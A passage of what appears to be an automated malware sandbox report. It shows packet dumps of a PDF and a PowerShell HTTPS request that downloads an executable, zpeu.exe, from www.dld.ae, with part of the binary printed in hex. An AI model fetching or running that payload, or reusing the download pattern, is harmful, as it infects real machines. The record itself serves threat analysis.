a4 70 30 f0 1c 32 91 68 e4 e8 40 16 05 ea d0 62 e0 bc b6 1a 48 f3 00 31 2f d8 8c 58 06 01 46 49 a6 fb 86 19 0c 2c 5d 97 19 35 19 a5 19 18 dc 96 31 2a e8 96 0b fe 64 d2 06 ab d0 66 e0 bc 69 0c a4 19 81 a8 12 48 eb 30 70 de 5a 03 e1 33 dd 85 bb 45 9f 81 f3 c9 2f 88 28 43 21 10 eb 32 70 de ed 04 d2 4c 0c 0c ec 85 70 55 46 0c 9c 5f be 43 55 bd 01 08 30 00 be 98 22 2e 0d 0a 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 31 33 30 20 30 20 6f 62 6a 0d 3c 3c 2f 41 63 72 6f 46 6f 72 6d 20 31 34 34 20 30 20 52 2f 4d 65 74 61 64 61 74 61 20 34 38 20 30 20 52 2f 4e 61 6d 65 73 20 31 34 35 20 30 20 52 2f 4f 75 74 6c 69 6e 65 73 20 31 30 33 20 30 20 52 2f 50 61 67 65 73 20 31 32 37 20 30 20 52 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 31 31 37 20 30 20 52 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 3e 3e 0d 65 6e 64 6f 62 6a 0d 31 33 31 20 30 20 6f 62 6a 0d 3c 3c 2f 43 6f 6e 74 65 6e 74 73 20 31 33 32 20 30 20 52 2f 43 72 6f 70 42 6f 78 5b 30 20 30 20 35 39 35 2e 34 34 20 38 34 31 2e 36 38 5d 2f 47 72 6f 75 70 3c 3c 2f 43 53 2f 44 65 76 69 63 65 52 47 42 2f 53 2f 54 72 61 6e 73 70 61 72 65 6e 63 79 2f 54 79 70 65 2f 47 72 6f 75 70 3e 3e 2f 4d 65 64 69 61 42 6f 78 5b 30 20 30 20 35 39 35 2e 34 34 20 38 34 31
                                                      Data Ascii: %PDF-1.7%129 0 obj<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>endobj 143 0 obj<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B34532>]/Index[129 38]/Info 128 0 R/Length 89/Prev 652771/Root 130 0 R/Size 167/Type/XRef/W[1 3 1]>>streamhbbd```b``":@$SXD'nldIFwfx-$4f`,V87@??@:Mendstreamendobjstartxref0%%EOF 165 0 obj<</C 180/E 164/Filter/FlateDecode/I 202/Length 167/O 126/S 74/V 142>>streamhb```a``d`e`Hgb@!fuvgu(;p02h@bH1/XFI,]51*dfiH0pZ3E/(C!2pLpUF_CU0".endstreamendobj130 0 obj<</AcroForm 144 0 R/Metadata 48 0 R/Names 145 0 R/Outlines 103 0 R/Pages 127 0 R/StructTreeRoot 117 0 R/Type/Catalog>>endobj131 0 obj<</Contents 132 0 R/CropBox[0 0 595.44 841.68]/Group<</CS/DeviceRGB/S/Transparency/Type/Group>>/MediaBox[0 0 595.44 841
                                                      Jun 1, 2023 12:14:29.714328051 CEST353INData Raw: 2e 36 38 5d 2f 50 61 72 65 6e 74 20 31 32 37 20 30 20 52 2f 52 65 73 6f 75 72 63 65 73 3c 3c 2f 45 78 74 47 53 74 61 74 65 3c 3c 2f 47 53 30 20 31 34 36 20 30 20 52 3e 3e 2f 46 6f 6e 74 3c 3c 2f 43 32 5f 30 20 31 35 31 20 30 20 52 2f 43 32 5f 31
                                                      Data Ascii: .68]/Parent 127 0 R/Resources<</ExtGState<</GS0 146 0 R>>/Font<</C2_0 151 0 R/C2_1 153 0 R/C2_2 158 0 R/TT0 161 0 R/TT1 164 0 R>>/ProcSet[/PDF/Text/ImageC]/XObject<</Im0 141 0 R/Im1 142 0 R>>>>/Rotate 0/StructParents 0/Tabs/S/Type/Page>>endob
                                                      Jun 1, 2023 12:14:29.714365005 CEST354INData Raw: 4e 5a c8 f5 22 96 52 50 da 90 e3 bb 5d 72 b5 4b ed e2 2e 62 75 a8 57 bc e4 52 97 2f 95 20 b9 12 9a e4 a2 e4 5a 44 2e 5d c4 e6 e4 fe ab af 36 4f 1f 7f b1 f9 76 77 fd 3f 32 96 97 ff 92 bf b7 17 5f 6e 9e fe 20 05 7f bc 79 7d fb e6 ea e6 ad 64 ff fa
                                                      Data Ascii: NZ"RP]rK.buWR/ ZD.]6Ovw?2_n y}dHzf/|{^>QnVA)kA|o^_?_7/y?_wrfw'jvo>~w_n^_8kxO_$
                                                      Jun 1, 2023 12:14:29.714397907 CEST356INData Raw: 98 e3 7b 45 e8 55 49 51 58 fe 21 85 28 f5 64 55 9a b0 b2 d1 be 7e 23 ea 37 64 15 f9 de 22 b1 af 23 ad fb dc 2a 26 42 fb db 8e fb 8b be ce fd 1c 7d 3c d1 3f f6 43 da c5 7b a8 83 b3 30 cf 9c 2c 1a 13 16 40 16 22 b8 7a 6f 76 b3 28 64 9f 9a 22 37 41
                                                      Data Ascii: {EUIQX!(dU~#7d"#*&B}<?C{0,@"zov(d"7Ai{fXeN>]}|%CZl1qKIj"uP1r|(4[T|8qM101Kc`9ZW}`b5ETkD A+>6wKo
                                                      Jun 1, 2023 12:14:29.714426994 CEST357INData Raw: 7c ea fb a7 ae 63 4d 96 38 12 15 26 db 47 d3 ec 40 86 39 f4 44 82 13 f9 54 aa c4 0a c1 84 d6 8e d2 39 3c 53 0b 8e 89 c0 b2 07 ff 96 52 dd a9 44 75 1c bc 05 ba ce a9 f4 e0 d7 2b 93 77 d4 63 30 df c2 1d 90 28 00 7f 24 61 2e 7a 41 bf 41 19 8c 85 7d
                                                      Data Ascii: |cM8&G@9DT9<SRDu+wc0($a.zAA}4I=hJ(z6m}FL~dIu,`hF:Wc$gh8OO>UjGA=03^mh!)f#i%^N*CjK6&w*%d
                                                      Jun 1, 2023 12:14:29.714456081 CEST358INData Raw: 46 98 0c 20 2f 3d cf e6 0f 88 3e 8c cb 1e 86 8c d9 4a 8d 08 71 4f f9 03 1d 16 9d 8d 7b eb 48 79 1c 7b 62 99 ba bb ff ec 63 e9 14 50 af 1a 88 cf a9 da 8c a4 71 1b 89 89 d2 8a d7 7d f8 b1 34 c2 18 08 f2 58 e4 cf 2a 76 2b 00 d7 39 e8 f4 39 a8 f4 d9
                                                      Data Ascii: F /=>JqO{Hy{bcPq}4X*v+99Q,3*on bby( &)9l,"/Gf9Awfx8w3l}@/9`LJvU*42TH3t2uPP'E`tayk~14[{a:Od
                                                      Jun 1, 2023 12:14:29.714489937 CEST360INData Raw: d9 5a 26 e9 5a ea 5b 9f f2 54 d5 b3 20 79 d4 e9 64 02 42 9f 26 0d 68 2f 64 e1 20 b4 0c 48 27 e6 57 63 00 22 a1 1b 3a 31 b0 90 fa a2 8b e6 4b 9c e6 39 4f 83 f1 d0 0a b4 85 e8 ea ab f6 cf 0b 2b f7 d5 fc d2 35 a1 1f b2 a1 ca 04 86 a0 30 73 a9 db 94
                                                      Data Ascii: Z&Z[T ydB&h/d H'Wc":1K9O+50sxjhA|c~OM',/bnB_ D0qNR8\UE9E^}zAox>;1lc/E##,wMrqRb{57/O#|?Nx#:"Qsxm
                                                      Jun 1, 2023 12:14:29.714518070 CEST361INData Raw: 5d e4 44 49 b2 f5 43 4f 45 41 72 34 26 17 0d 58 75 b2 dd c7 56 1d 5b 44 b8 02 4a 7c b0 16 20 19 22 04 11 df b2 be ae ae 5b 93 de c0 7f 80 09 74 0c 7f 0e d0 c4 e5 02 3e 13 ea 28 a1 31 b6 b3 84 16 e4 e8 ad 04 9a 98 23 4a 85 c1 1e f4 2e 59 09 ac 45
                                                      Data Ascii: ]DICOEAr4&XuV[DJ| "[t>(1#J.YEl>$GZ!8.=8d+JK(iR1CHRyS1_05YNwkOr1LgRp(AHB]9TJM"U"~qT
                                                      Jun 1, 2023 12:14:29.714546919 CEST362INData Raw: 2e b7 ae c8 00 8f c8 4a f9 1b b3 0d 5f 51 55 7b 22 91 da ad cc 51 18 1a 61 63 c7 17 36 0a df 9d 9d 2d 58 29 a8 26 76 cc 2b 9c 47 0c a1 05 ae 06 0a 03 82 c4 00 db 85 db 30 12 b1 27 0d c0 db 07 ab 04 85 d0 1e 84 a4 f7 84 c7 70 6c 05 e0 75 01 6d 82
                                                      Data Ascii: .J_QU{"Qac6-X)&v+G0'plum.XURY%\.CgxS2'3" Qd2LrC8_#:bhn5,,d00~c=y<6'??-X2+qat+L@l8=I'iwy<q
                                                      Jun 1, 2023 12:14:29.714576960 CEST364INData Raw: 2d 58 8b 25 d3 a6 94 33 1e cb cc 41 8f 42 03 92 f1 13 4c a5 09 8c 5c b6 21 5c 04 b0 16 47 f4 04 ef 02 f7 13 35 fe 0a f8 a7 84 6b ee f6 1c 81 72 68 12 a7 0a 2a 13 ad fb 5d d4 e6 48 f8 40 07 9a 0d 30 36 e0 2b 3b 33 11 7f 49 63 38 e1 e5 0d 70 f3 c2
                                                      Data Ascii: -X%3ABL\!\G5krh*]H@06+;3Ic8p!V X(hFFP6gC5W#6j@NP$RXYa9BWy>@-6NVtZ180 sjzxS4t<F2a:Z$M5&
                                                      Jun 1, 2023 12:14:29.882395029 CEST365INData Raw: 37 57 fe 55 1b 38 c8 06 71 4b e0 39 24 1b 0c 40 52 49 1f 15 9a 3a e7 24 23 aa 11 e0 e6 00 13 e3 b3 63 3f d0 ab 1b 0e fb 01 8e b3 32 b6 55 67 17 c6 5e c0 54 16 1a 54 b3 6e 77 ec 01 80 8c 9b a7 cd 94 4e d4 aa 70 ec d1 e6 d8 5b dc 47 a8 07 3d b9 d9
                                                      Data Ascii: 7WU8qK9$@RI:$#c?2Ug^TTnwNp[G=~YOyb7fE+5IT$0D_%AJu'>q/nNLa!0q#@w4aSDA"/|KF8lJL


                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.44969484.16.234.51443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampkBytes transferredDirectionData
                                                      2023-06-01 10:14:27 UTC0OUTGET /zp/zpeu.exe HTTP/1.1
                                                      Host: www.dld.ae
                                                      Connection: Keep-Alive
                                                      2023-06-01 10:14:27 UTC0INHTTP/1.1 200 OK
                                                      Date: Thu, 01 Jun 2023 10:14:27 GMT
                                                      Server: Apache
                                                      Upgrade: h2,h2c
                                                      Connection: Upgrade, close
                                                      Last-Modified: Thu, 01 Jun 2023 09:47:42 GMT
                                                      Accept-Ranges: bytes
                                                      Content-Length: 344681
                                                      Content-Type: application/x-msdownload
                                                      2023-06-01 10:14:27 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 27 95 75 59 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 64 00 00 00 2a 02 00 00 08 00
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PfPfPf*_9PfPgLPf*_;PfsVPf.V`PfRichPfPEL'uYd*
                                                      2023-06-01 10:14:27 UTC8INData Raw: 40 00 7b 16 40 00 cc 16 40 00 35 17 40 00 5c 17 40 00 6f 17 40 00 0c 19 40 00 0f 19 40 00 41 19 40 00 56 19 40 00 68 19 40 00 ff 19 40 00 30 1a 40 00 72 1a 40 00 b0 1a 40 00 4d 1b 40 00 71 1b 40 00 19 1c 40 00 19 1c 40 00 ed 1c 40 00 0e 1d 40 00 33 1d 40 00 57 1d 40 00 b3 1d 40 00 43 1e 40 00 77 1e 40 00 00 1f 40 00 52 1f 40 00 86 1f 40 00 2b 20 40 00 fe 20 40 00 53 22 40 00 d7 22 40 00 06 23 40 00 48 23 40 00 88 23 40 00 de 23 40 00 7e 24 40 00 f2 24 40 00 5c 25 40 00 70 25 40 00 92 25 40 00 44 26 40 00 e7 27 40 00 1b 28 40 00 35 28 40 00 62 28 40 00 a7 28 40 00 a2 29 40 00 2f 2a 40 00 bf 2a 40 00 bf 2a 40 00 9a 2a 40 00 92 25 40 00 44 26 40 00 dc 1a 40 00 e0 1a 40 00 e4 1a 40 00 e9 1a 40 00 f6 1a 40 00 fa 1a 40 00 fe 1a 40 00 02 1b 40 00 0b 1b 40 00 15
                                                      Data Ascii: @{@@5@\@o@@@A@V@h@@0@r@@M@q@@@@@3@W@@C@w@@R@@+ @ @S"@"@#@H#@#@#@~$@$@\%@p%@%@D&@'@(@5(@b(@(@)@/*@*@*@*@%@D&@@@@@@@@@@
                                                      2023-06-01 10:14:27 UTC15INData Raw: 0e 6a 07 e8 bc c9 ff ff 85 c0 75 03 40 eb 02 33 c0 50 6a 00 68 65 04 00 00 ff 75 08 ff d6 33 c0 5e 5d c2 10 00 55 8b ec 81 ec 80 00 00 00 8b 45 14 53 56 8b 75 10 57 6a dc 85 c0 5b 74 0b 0f ac c6 14 c1 e8 14 33 ff eb 4e 6a 14 81 fe 00 00 10 00 59 8b c6 73 06 6a 0a 59 6a dd 5b 81 fe 00 04 00 00 73 05 6a de 33 c9 5b 81 fe 33 33 ff ff 73 0d 33 c0 6a 14 40 5f d3 e0 99 f7 ff 03 c6 8b f0 25 ff ff ff 00 6a 0a 33 d2 8d 04 80 03 c0 d3 e8 d3 ee 59 f7 f1 8b fa 8d 45 c0 6a df 50 e8 85 17 00 00 50 8d 45 80 53 50 e8 7a 17 00 00 50 57 56 68 a0 a3 40 00 ff 75 0c be e8 36 42 00 56 e8 64 17 00 00 56 8b f8 e8 50 17 00 00 8d 04 47 50 ff 15 90 82 40 00 83 c4 18 56 ff 75 08 ff 35 d8 91 42 00 e8 5e 0d 00 00 5f 5e 5b c9 c2 10 00 8b 44 24 0c 33 c9 51 50 ff 74 24 10 ff 74 24 10 e8
                                                      Data Ascii: ju@3Pjheu3^]UESVuWj[t3NjYsjYj[sj3[33s3j@_%j3YEjPPESPzPWVh@u6BVdVPGP@Vu5B^_^[D$3QPt$t$
                                                      2023-06-01 10:14:27 UTC23INData Raw: 00 00 89 45 a8 7d 05 89 55 c8 eb 10 83 7d c8 0a 7d 06 83 6d c8 03 eb 04 83 6d c8 06 39 55 cc 74 1c 8b 45 ec 2b 45 d4 3b 45 8c 72 03 03 45 8c 8b 4d f8 33 db 43 8a 04 08 88 45 a5 eb 68 33 db 43 e9 cd 01 00 00 8b 45 fc 8b 4d c8 c7 45 cc 01 00 00 00 c7 85 7c ff ff ff 07 00 00 00 8d b4 48 80 01 00 00 e9 d3 05 00 00 83 7d 94 00 0f 84 67 07 00 00 8b 4d 90 8b 45 f4 c1 65 f0 08 0f b6 09 ff 4d 94 c1 e0 08 0b c1 ff 45 90 89 45 f4 8b 45 c0 39 45 b8 0f 85 ad 00 00 00 81 fb 00 01 00 00 0f 8d 05 01 00 00 0f b6 45 a5 d0 65 a5 8b 4d a8 c1 e8 07 89 45 b8 40 c1 e0 08 03 c3 8d 34 41 8b 4d f0 c1 e9 0b 66 8b 06 89 75 ac 0f b7 d0 0f af ca 39 4d f4 73 1a 83 65 c0 00 89 4d f0 b9 00 08 00 00 2b ca c1 f9 05 03 c8 03 db 66 89 0e eb 1d 29 4d f0 29 4d f4 66 8b c8 c7 45 c0 01 00 00 00
                                                      Data Ascii: E}U}}mm9UtE+E;ErEM3CEh3CEME|H}gMEeMEEE9EEeME@4AMfu9MseM+f)M)MfE
                                                      2023-06-01 10:14:27 UTC31INData Raw: 00 69 00 6e 00 63 00 6f 00 6d 00 70 00 6c 00 65 00 74 00 65 00 20 00 64 00 6f 00 77 00 6e 00 6c 00 6f 00 61 00 64 00 20 00 61 00 6e 00 64 00 20 00 64 00 61 00 6d 00 61 00 67 00 65 00 64 00 20 00 6d 00 65 00 64 00 69 00 61 00 2e 00 20 00 43 00 6f 00 6e 00 74 00 61 00 63 00 74 00 20 00 74 00 68 00 65 00 0a 00 69 00 6e 00 73 00 74 00 61 00 6c 00 6c 00 65 00 72 00 27 00 73 00 20 00 61 00 75 00 74 00 68 00 6f 00 72 00 20 00 74 00 6f 00 20 00 6f 00 62 00 74 00 61 00 69 00 6e 00 20 00 61 00 20 00 6e 00 65 00 77 00 20 00 63 00 6f 00 70 00 79 00 2e 00 0a 00 0a 00 4d 00 6f 00 72 00 65 00 20 00 69 00 6e 00 66 00 6f 00 72 00 6d 00 61 00 74 00 69 00 6f 00 6e 00 20 00 61 00 74 00 3a 00 0a 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 6e 00 73 00 69 00 73 00 2e 00 73 00
                                                      Data Ascii: incomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.s
                                                      2023-06-01 10:14:27 UTC39INData Raw: 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03
                                                      Data Ascii:
                                                      2023-06-01 10:14:27 UTC47INData Raw: ff 8e 52 09 ff 93 59 12 ff 9b 63 1d ff a1 6a 25 ff 9e 69 26 ff 88 54 12 ff 60 31 00 ff 49 26 02 c5 09 09 09 36 03 03 03 17 01 01 01 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 02 02 02 11 04 06 09 2f 47 29 05 94 9c 5d 0f ff b8 76 24 ff c9 81 29 ff ce 85 29 ff d2 86 28 ff d1 82 23 ff cf 81 20 ff d1 82 20 ff d3 83 1f ff d5 83 1f ff d5 84 1f ff d8 86 1f ff db 87 1e ff dd 89 22 ff e3 9d 46 ff e5 a0 4c ff e6 a0 4b ff e7 9d 43 ff e1 8c 20 ff c7 86 20 ff b2 8f 39 ff b2 91 3d ff b0 90 3b ff af 90 3b ff b1 92 3b ff b2 93 3b ff b3 94 3c ff b3 94 3a ff b2 94 3a ff b1 94 3b ff b1 91 32 ff af 85 1a ff b1 92 32 ff af 8b 22 ff af 87 18 ff b2 94 30 ff b0 8c 1d ff b6 8a 29 ff b9 8b 3c ff b5 89 2c ff af 8a 16 ff b0 8c
                                                      Data Ascii: RYcj%i&T`1I&6/G)]v$))(# "FLKC 9=;;;;<::;22"0)<,
                                                      2023-06-01 10:14:27 UTC54INData Raw: ff 08 73 0f ff 06 71 0d ff 05 70 0c ff 02 6d 0a ff 02 6e 09 ff 01 6f 0a ff 00 70 08 ff 00 6d 05 ff 03 70 0a ff 0e 73 0e ff 18 74 17 ff 27 7c 27 ff 3a 7b 3c ff 77 95 79 ff a1 a5 a2 ff b8 b2 b8 ff b4 b6 b4 ff ac b2 a9 ff a9 a9 99 ff a0 93 71 ff 91 90 74 ff 5d 8a 5d ff 3b 7c 3f ff 0a 6b 0d ff 02 71 0a ff 08 73 11 ff 09 71 10 ff 07 6f 0e ff 08 70 0f ff 09 73 10 ff 0a 70 10 ff 0b 72 10 ff 0b 70 0f ff 18 70 0f ff 2a 6e 0f ff 4f 68 0d ff 98 5e 0b ff a1 58 0a ff 9d 57 0a ff 99 56 09 ff 96 53 09 ff 91 51 09 ff 8d 4e 09 ff 89 4c 08 ff 85 4a 08 ff 81 48 08 ff 81 4a 0d ff 88 54 18 ff 90 5d 23 ff 92 61 29 ff 86 56 1f ff 63 35 04 ff 54 24 00 f9 1c 12 07 59 01 02 03 12 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii: sqpmnopmpst'|':{<wyqt]];|?kqsqopsprpp*nOh^XWVSQNLJHJT]#a)Vc5T$Y
                                                      2023-06-01 10:14:27 UTC62INData Raw: ff b6 79 35 ff b5 79 33 ff b5 77 32 ff b4 77 31 ff b4 77 31 ff b5 78 31 ff b6 77 31 ff b7 77 31 ff b6 77 31 ff b1 70 29 ff b9 93 6a ff d4 d9 e0 ff c2 c7 c8 ff 98 a5 9a ff a4 98 a4 ff ce c8 cf ff b9 ad bb ff a0 a4 a1 ff 90 89 8f ff a0 78 9a ff 93 71 8f ff 7d 7d 7e ff 8a 5d 7f ff 75 73 76 ff 7e 75 7f ff a6 a6 ab ff c1 c6 c9 ff be c2 c6 ff be c2 c6 ff be c2 c6 ff c1 c5 ca ff a7 ae b2 ff 8b 6f 44 ff 98 72 3c ff 98 73 3e ff 9a 74 3f ff 89 6d 3c ff 2d 52 31 ff 0e 42 28 ff 32 52 3b ff 6f 6c 6f ff 6e 6c 6e ff 6b 6c 6e ff 6f 65 56 ff 81 61 36 ff 73 68 50 ff 6f 6c 5f ff 6b 66 58 ff 6c 6a 61 ff 6d 6b 61 ff 6c 69 60 ff 68 64 5a ff 66 5e 4f ff 67 66 5b ff 60 53 3a ff 6a 51 2f ff 5a 4f 39 ff 97 a4 ad ff c3 c6 ca ff be c2 c6 ff be c2 c6 ff be c2 c6 ff be c2 c6 ff bd c1
                                                      Data Ascii: y5y3w2w1w1x1w1w1w1p)jxq}}~]usv~uoDr<s>t?m<-R1B(2R;olonlnklnoeVa6shPol_kfXljamkali`hdZf^Ogf[`S:jQ/ZO9
                                                      2023-06-01 10:14:27 UTC70INData Raw: ff 33 2a 23 ff 34 22 15 ff 37 24 16 ff 3a 26 16 ff 39 25 15 ff 3a 25 15 ff 66 38 16 ff 71 3c 16 ff 6c 3a 14 ff 6a 3a 15 ff 74 44 20 ff 7e 51 2f ff 85 58 37 ff 7a 50 2e ff 4e 24 0a ff 2f 0f 01 df 0b 07 04 2b 00 00 01 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 01 02 03 11 32 19 06 9f 89 53 29 ff ac 72 46 ff ad 74 46 ff ad 73 44 ff aa 6d 3f ff a8 6b 3a ff a8 6a 3a ff a7 68 39 ff a8 69 39 ff a8 69 39 ff a8 69 39 ff a7 66 34 ff b5 8d 6f ff cb d2 d7 ff cd d0 d4 ff bc c9 bf ff ac 8c a6 ff 9e 6f
                                                      Data Ascii: 3*#4"7$:&9%:%f8q<l:j:tD ~Q/X7zP.N$/+2S)rFtFsDm?k:j:h9i9i9i9f4oo
                                                      2023-06-01 10:14:27 UTC78INData Raw: ff aa ad b1 ff d7 dc e0 ff d6 da dc ff b6 c2 cc ff 08 1c 7c ff 00 02 75 ff 43 87 6b ff 43 8a 6f ff 46 8f 6a ff 34 69 6e ff 00 00 72 ff 1a 36 84 ff c4 ce d3 ff d5 d8 db ff d4 d8 dc ff ca cd d2 ff 3a 3a 3c ff 27 27 27 ff 2c 2c 2c ff 2b 2b 2b ff 2d 2d 2d ff 29 29 29 ff 2d 2d 2d ff 28 27 27 ff 2e 2e 2f ff c0 c5 c9 ff d5 d9 dd ff d6 d9 dc ff b7 c5 ce ff 0b 21 7f ff 00 00 6f ff 3b 5d 9c ff 56 88 a8 ff 45 77 96 ff 2b 46 93 ff 00 00 6d ff 1b 34 8b ff ca d2 d7 ff d4 d8 db ff d6 db df ff b4 b8 bb ff 24 24 24 ff 21 21 21 ff 23 23 23 ff 20 20 20 ff 21 21 21 ff 21 21 21 ff 21 21 21 ff 1e 1e 1e ff 40 40 40 e1 5c 5c 5c b1 58 58 58 b3 58 58 58 b3 5c 5c 5c b3 5f 5f 5f b3 69 69 69 b2 8d 8d 8d df b1 b0 b1 ff b4 b4 b4 ff 96 96 96 ff 52 52 52 db 05 05 05 13 00 00 00 00 00 00
                                                      Data Ascii: |uCkCoFj4inr6::<''',,,+++---)))---(''../!o;]VEw+Fm4$$$!!!### !!!!!!!!!@@@\\\XXXXXX\\\___iiiRRR
                                                      2023-06-01 10:14:27 UTC86INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      2023-06-01 10:14:27 UTC94INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      2023-06-01 10:14:27 UTC101INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      2023-06-01 10:14:27 UTC109INData Raw: ff 8e 90 75 ff 8f 94 7d ff 80 8c 71 ff 65 7c 53 ff 63 7d 52 ff 47 75 33 ff 32 71 20 ff 33 6e 1b ff 37 6e 19 ff 3a 6f 1a ff 36 6e 16 ff 35 6e 14 ff 3c 6f 17 ff 3a 6f 12 ff 3b 70 0e ff 3e 71 0c ff 44 74 0d ff 4a 74 0d ff 52 76 0f ff 56 76 10 ff 5c 74 10 ff 64 76 10 ff 6e 76 0f ff 78 75 0f ff 83 76 0f ff 8e 75 0e ff 9a 74 0d ff a8 73 0d ff b5 74 0d ff c0 73 0b ff c9 72 0b ff cc 72 0b ff ca 70 0a ff c6 70 0a ff c1 6d 0a ff bc 6b 0a ff b7 67 0a ff b1 64 09 ff ac 61 09 ff a6 5e 09 ff a0 5a 09 ff 9a 57 09 ff 94 53 08 ff 8d 50 08 ff 88 4d 07 ff 8a 52 0f ff 95 5f 1f ff 99 65 28 ff 84 52 17 ff 62 30 00 ff 26 16 06 71 01 02 04 11 00 00 00 02 